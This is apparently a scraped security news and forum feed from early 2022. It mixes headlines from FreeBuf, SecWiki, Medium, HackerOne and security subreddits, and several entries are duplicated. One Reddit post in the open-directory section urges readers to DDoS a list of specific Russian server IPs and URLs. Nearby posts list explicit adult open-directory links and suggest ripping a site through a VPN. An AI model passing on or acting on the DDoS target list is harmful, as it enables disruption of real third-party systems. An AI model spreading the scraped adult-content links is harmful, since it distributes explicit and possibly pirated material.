    I'm reading up on zero trust and keeping hearing about it but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec [link] [comments]
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the twitter of Recoreded Future and Greynoiseio. Both of them anoounced that they would apply full resources and capabilities to support ukraine in their fight against Russia. Trying to find a sub that can aswer this... seems reasonable from someone that knows little about the cyber world, So... Is it really helpful for defend ukraine agianst from russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288 [link] [comments]
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and im a junior. The requirements is that I "interview" someone and I dont know anyone in real life, I hope its okay thank you submitted by /u/Mokushi99 [link] [comments]
    What is the going rate for a zero day these days?
    Curious of what the going rate for a zero day is on the black market; or even the legit market. submitted by /u/me_z [link] [comments]
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Invoke-EDRChecker:一款功能强大的主机安全产品检测工具
    该工具能够对正在运行的进程进行详细的安全检查,包括进程进程元数据、加载到当前进程中的DLL以及每个DLL元数据。
    以数据为中心的数据安全基础能力建设探索
    本文数据为中心的理念,围绕数据识别、分类分级、基础防护几个方面,结合开源软件做一次梳理和功能演示。
    FreeBuf早报 | 三星上亿部手机曝出严重加密漏洞;乌克兰招募黑客防御俄罗斯网络攻击
    由于大规模分布式拒绝服务(DDoS)攻击,多个乌克兰政府网站于周三下线了。
    CISA 已知被利用漏洞列表中,新增两个 Zabbix 漏洞
    美国网络安全基础设施和安全局(CISA) 在其已知利用漏洞目录中新增两个Zabbix 漏洞。
    FreeBuf甲方群话题讨论 | 聊聊复杂形势下的企业安全预算
    《个保法》、《数据安全法》、log4爆发,最近一年来安全圈的频繁动作会给今年企业安全预算带来哪些影响?
    微软应用商店现“克隆”游戏,内涵恶意程序Electron Bot
    通过克隆《地铁跑酷》 和《神庙逃亡》等流行游戏,Electron Bot已渗透进了微软应用商店。
    俄乌战争期间,美国警告要注意“浑水”趁乱搞事情
    美国和英国发布警告称,一个已经确定有伊朗国家背景的黑客组织正在俄乌大战期间,针对全球目标开展数字攻击以及其他的恶意活动。
    微软Exchange服务器被黑客攻击以部署Cuba勒索软件
    勒索软件Cuba正利用微软Exchange的漏洞进入企业网络并对设备进行加密。
    积跬步,至千里,白帽积木的挖洞之路
    近4年,从小白到MVP的挖洞之路。
    研究发现,元宇宙的成人内容对未成年用户开放
    据BBC的一项最新调查,儿童可以通过元宇宙访问性方面的相关内容。
    保护力度不够的Microsoft SQL数据库正成为黑客攻击的目标
    日前有数据显示,黑客正在易受攻击的Microsoft SQL数据库中安装Cobalt Strike信标,以此获得在目标网络中的立足点。
    重磅!全球黑客组织对俄罗斯发起“网络战争”
    战争让人们更加珍惜来之不易的和平:我们从不欢呼战争,但也不惧怕战争。
    如何使用PHP Malware Finder检测主机中潜在的恶意PHP文件
    PHP Malware Finder是一款针对主机安全和PHP安全的强大检测工具,广大研究人员可以轻松检测其主机或服务器中可能存在的潜在恶意PHP文件。
    FreeBuf周报 | Monzo数字银行用户正受网络钓鱼威胁;Meyer披露影响员工的网络攻击
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!热点资讯1、白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上2、英国Monzo数字银行用户正受网络钓鱼威胁3、数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元4、暴富、反水、围剿……Conti勒索组织魔幻的2021年5、这样的钓鱼邮
    乌克兰政府和金融机构遭疑似俄黑客袭击
    这一恶意软件被部署在乌克兰网络上的数百台设备当中。
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »

  • Open

    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0
  • Open

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369 [link] [comments]
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Understanding Threat Actor’s by @berkdusunur
    submitted by /u/EyeAccomplished5529 [link] [comments]
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut [link] [comments]
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Curious
    out of curiosity are my chances good to land a junior infosec job, SOC analyst, or a sysadmin position based on my work experience it’s not a lot and i am new to the IT field but to sum it all up the only work experience i have is when i was a geek squad agent at best buy, when i worked at a call center, and most recently i got a job as a junior help desk technician i also have 0 certs by the way and i’m too lazy to send it my actual resume hahaha submitted by /u/Jkarl0880 [link] [comments]
    Doubt on Session Cookies
    Hi, I am exploring Burpsuite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this: POST / HTTP/1.1 Host: markup.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://markup.htb Connection: close Referer: http://markup.htb/ Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln Upgrade-Insecure-Requests: 1 username=test&password=test I noticed that Cookie header is already present, even before my request can reach webserver. Can someone enlighten me on this ? Thankyou!! submitted by /u/g-simon [link] [comments]
    I found a major security flaw in Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question but here goes. Without getting into details I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it) but they said they don't handle issues with live websites, I also informed Lens.com but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid [link] [comments]
    Providing SSN over voicemail for employer to access fingerprinting results? is it safe? Says she will delete the voicemail when her meeting sends.
    Ends* not sends, typo. I got fingeprinted for background check (im working in education, working at a private school) and have to tell my ssn to employer so they can log in database to check the fingerprint results before i start. Im not comfortable providing my SSN over email and one of my employers told me that was okay and i can give the employer in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends and if i could leave my SSN through voicemail and she will delete the message once the meeting is over and will run the ssn through the database. she told me she couldnt do tommorow since she was leaving out of country and i need to give it before monday on the day i start to have results checked is this safe to leave a voicemail with my ssn since though she will delete it afterwards? seems it my only option or should i just forget this job altogether if this is my only choice or request someone else who is available to do it with? i think she is the only one..... update : i decided to do it since time was ticking since i start Monday and the employer is off to another country tomorrow so i wont be able to connect with her, which i find very weird. Did i put myself at risk?? probably. Did i feel immediate regret after doing it? Yes i did. nervous as heck, i hope i will be fine after this. submitted by /u/lostspirit10 [link] [comments]
    RSA Netwitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks on field actually think of it. Have you ever tried or had hands on with RSA Netwitness SIEM? Any feedback on UX, Threat hunting, correlation capabilities etc? Thanks! submitted by /u/Peanutbutter-0 [link] [comments]
    Is this tool worth it ?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source, I gave it a try and it looks cool. I run a network scan with multiple tools at the same time(nmap,tsunami,nuclei) and got back a full report with just a few commands. ​ The thing is am still confused, on the difference between the open source and the payed version. Have you tried the platform before ? Do you think it is worth the money? submitted by /u/deadlyhayena [link] [comments]
    Anyone know about difference between BGP and DNS communication?
    Hi guys, i'm student in software engineer major these days, i'm interested in RPKI hijacking. I saw the news that by BGP hijacking, cryptocurrency is now in danger. As far as i know, RPKI is the certificate of the Router, and without RPKI risk of BGP hijacking is more dangerous. But, I can't understand the difference between BGP and DNS communication. Of course i did searching in google, but it is too deep for me to understand. Please teach me the difference between BGP, DNS communication easily...(to the point whre newbies can understand) submitted by /u/Late_Ice_9288 [link] [comments]
    vulnerable?
    Hi guys, how do I find out whether my own ip address is vulnerable atm ? submitted by /u/alicia30765 [link] [comments]
  • Open

    How i Found Single click open redirect at xiaomi ( Arabic )
    Single click open redirect السلام عليكم , اليوم بكتب لكم عن كيف حصلت ثغرة Continue reading on Medium »
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt?
    Hello, those who are at the computer day and night. Continue reading on Medium »
    Take part of our Bug Bounty Program ‍
    As you well know Avacash.Finance is a fork of Tornado.cash in the Avalanche Blockchain, which means that we offer a fully decentralized… Continue reading on Medium »
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language… Continue reading on Medium »
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    Hey Readers 👋, Hope you are doing great, Continue reading on InfoSec Write-ups »
  • Open

    ODs/Calibre servers from Russia
    In solidarity with ukrainian people, after the cyber attack of russian goverment against ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list : ODs https://julia.paimon.pro/ https://91.240.125.178/ http://files.net57.ru/ http://b1.artplanet.su/ http://5.56.134.67:8080/ http://178.140.239.157/ http://91.214.68.245/ http://212.109.223.247:9000/ http://188.226.41.25/ https://109.194.141.225/ http://5.8.64.57/ https://45.84.225.49/ http://195.218.199.70:8888/ https://193.106.132.50/ http://195.93.160.105/ http://109.200.155.175/ http://176.193.170.202/ http://141.101.188.153/ http://80.78.193.77:8080/ Calibres http://87.117.1.35:9191/ http://90.188.92.137:8080/ http://37.143.24.7:8080/ http://89.111.132.113:8180/ http://80.234.32.202:8888/ http://176.12.99.146:8123/ http://136.169.223.16:8080/ https://195.91.231.203:8443/ I hope the Russians love their children too ! Slava Ukraine ! ​ https://preview.redd.it/h44axndgquj81.jpg?width=281&format=pjpg&auto=webp&s=ea63007f203cd1f7fe4bd3c434620b969861e464 submitted by /u/krazybug [link] [comments]
    Diff links to other places, funny music ect...
    Ok went for a wander and here are a few findings not claiming they are all new but just what I found on a rabbit hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ ​ cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ ​ Sounds language stuff... http://211.110.1.18/Suda_Data/ ​ cooking http://www.medigaplife.com/videos/recipes/ ​ Funny's old but still funny gif jpg ect... http://www.brainbox.cc/funny/ ​ Memes what was relevant then... http://www.mercilesstruth.com/memes/ ​ Funny yep just funny, some old chan stuff, vids evt... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ ​ Well movies music'ish just stuff... https://johnbot.org/Share/ ​ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ ​ Images funny'ish do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ ​ Funny, music. MP4s and lots more... http://www.aircam6600.com/1/mp4/ ​ Ok well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat [link] [comments]
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short Jav I think some pixelated... https://www.xxxx-videos.com as above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD Jav as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4's http://24.138.249.6/Peliculas/Adultos/ What it says in the link Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat [link] [comments]
  • Open

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK
    Continue reading on Medium »
  • Open

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I’m Matt Schultz — former Digital Archivist, Curator & Preservationist. I’m so excited to be… Continue reading on Medium »
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within… Continue reading on Medium »
  • Open

    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed. The post SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors appeared first on Unit42.
  • Open

    Zero-day XSS vulnerability in Horde webmail client can be triggered by
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0
  • Open

    离职后,你会访问前公司账户吗?
    合理的离职流程可以减少离职员工危害前雇主。
    FreeBuf早报 | 美国受到勒索软件警告;乌数百台计算机遭wiper恶意软件攻击
    一名尼日利亚国民在纽约南区地方法院承认侵入一家公司账户并窃取工资存款。
    俄罗斯闪战乌克兰,网络战早已打响
    俄乌冲突持续发酵已久。
    2021社交媒体攻击又创记录,金融安全仍在榜首
    社交媒体已成为黑客分发威胁渠道之一,在整个2021年这个渠道的攻击次数增加了两倍。
    支付赎金后勒索软件勒索并未停止
    一项关于勒索软件受害者经历的全球调查强调了勒索软件参与者缺乏可信度,因为在大多数支付赎金的情况下,勒索仍在继续。
    3月11日晚19点 | 安全基建下,如何建设资产识别能力
    3月11日(周五)晚上19:00,阿里巴巴集团安全部高级安全专家-阿刻将为我们带来主题为《新安全基建下,如何建设资产识别能力》的公开课。
    华硕子公司ASUSTOR遭攻击,被勒索上千万元赎金
    此次勒索攻击波及全球众多用户,并在ASUSTOR论坛上引起来广泛讨论。
    数据中心基础设施的运维与管理
    为规范数据中心基础设施的运维管理,各企事业单位应参照相关国家标准建立运维管理体系、制度、流程等措施,保证信息化业务安全、稳定、正常运行。
    利用撞库攻击,一尼日利亚黑客将他人工资据为己有
    从2017年7月开始,攻击者累计入侵了5500个用户账户,总共转移了80万美元。
    安全第一季-【事无小事安全先行】
    病毒是一种暗中感染计算机系统并进行破坏的程序。病毒代码潜藏在其它程序、硬盘分区表或引导扇区中等待时机
    微软洞察:身份管理漏洞成为数字安全首要威胁
    过去两年,疫情影响下的新常态加速了全球范围内的数字化转型,数字化能力已经成为企业与个人生存与发展的核心能力。
    网络犯罪案例分析-非法获取APP数据(四十二)
    为牟私利,非法获取APP数据,构成非法获取计算机信息系统数据罪,判处有期徒刑四年六个月。
    不可见,无安全!值得关注的十大国外SASE厂商(2022版)
    传统的网络安全防护措施将不能够满足复杂的网络架构,提升网络可见性将是未来网络安全防护技术的重要发展趋势。
    大和证券(中国)招聘了!信息安全管理岗等你来投
    大和证券(中国)有限责任公司是一家落户中国北京的新设外资控股证券公司。
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...

  • Open

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet- [link] [comments]
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble [link] [comments]
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture [link] [comments]
    Bit more porn...
    This site I have already ripped and made into torrent but it's still up... itaporno Remember use a VPN if you rip it... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Looking for Place to Find latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we do a presentation on a current technology or case in Digital Forensics. Anybody know of a good way to find these articles, like what to put in the search bar or what websites to best check out? submitted by /u/Mattdarkninja [link] [comments]
    Windows 10 reset artifacts
    Can someone help me to find traces of artifacts left on windows 10 machine which has been reset 5 months back and repurposed to another user? A reference material on finding windows 10 reset and refresh artifacts will be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall [link] [comments]
    Putting user behind keyboard/knowledge
    If files are found automatically synced to a computer, no evidence that suspect had knowledge of them (folder never opened, file never viewed)… also the file was not downloaded by any deliberate action. Cannot determine who uploaded them in the first place or device used to do so Is it enough to make a case based on name on the account when multiple individuals reside at a place? submitted by /u/Complete-Cockroach80 [link] [comments]
    Newcomer to the field
    If this post is against rules in any way I apologize and please take it down.| Greetings everyone. I graduated last year and got my bachelors in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not and am considering moving to the US and get a job there. Any advice? Sites to search for job offers for this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514 [link] [comments]
  • Open

    Automating bug bounties
    submitted by /u/pedro_benteveo [link] [comments]
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001 [link] [comments]
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury [link] [comments]
    tmp.0ut Volume 2
    submitted by /u/VVX7 [link] [comments]
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus [link] [comments]
  • Open

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only. Continue reading on Medium »
    Beginner Bug Bounty Journey
    # Introduction Continue reading on Medium »
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below: Continue reading on Medium »
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target. Continue reading on System Weakness »
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here. Continue reading on InfoSec Write-ups »
  • Open

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event. Continue reading on Medium »
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations Continue reading on Medium »
    Bus and Rocks— OSINT Challenge 19 and 20
    Quiztime (contributor @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of wired. For kollege's we have to… Continue reading on Medium »
  • Open

    Pentesting a windows box
    Hello everyone! Just a question how do you start a windows box? I am doing some HTB this past few weeks and only testing the linux boxes, now how you guys learned to pentest a windows box? (I dont have any background on ActiveDirectory stuffs) Thank you! submitted by /u/pldc_bulok [link] [comments]
    Implications of disabled, factory install of Facebook on Android device.
    I do not use Facebook ,but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does Disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip [link] [comments]
    Email compromised, address spoofed, or elaborate phishing email?
    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails when you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in sent, and I don't see anything unusual in drafts or sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce back email had my address as the sender, but the contact name on it was just random letters, not my name that I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD [link] [comments]
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years(stay at home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level(had 5yrs exp) and decided Cybersecurity was the way to go. I did not have a tech degree, or any other certs and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC focused sys admin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything, SCCM, AWS, Azure, GCP, VmWare, Citrix, C…
    Using Quantitative Risk Metrics to get Csuite buy in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound in that a value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company so investing w to reduce risk is basic math the c-suite can get. My barriers to this are: Getting an effective asset valuation as no one seems to track initial investment and sustainment costs let alone cyber security costs. Building this into SOP when tagging assets. Tagging right now is limited so this needs to be fixed too. Anyone here effectively put in quantitative risk practice that can share what worked? submitted by /u/finnthethird [link] [comments]
    what's the deal about ip addresses?
    I know this is so fundamental basic stuff but why is this thing so crucial/ submitted by /u/alicia30765 [link] [comments]
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler [link] [comments]
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
  • Open

    Deliviry Club Courier app (v. 3.9.25.0); Disclosure phone number of client.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add upto 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
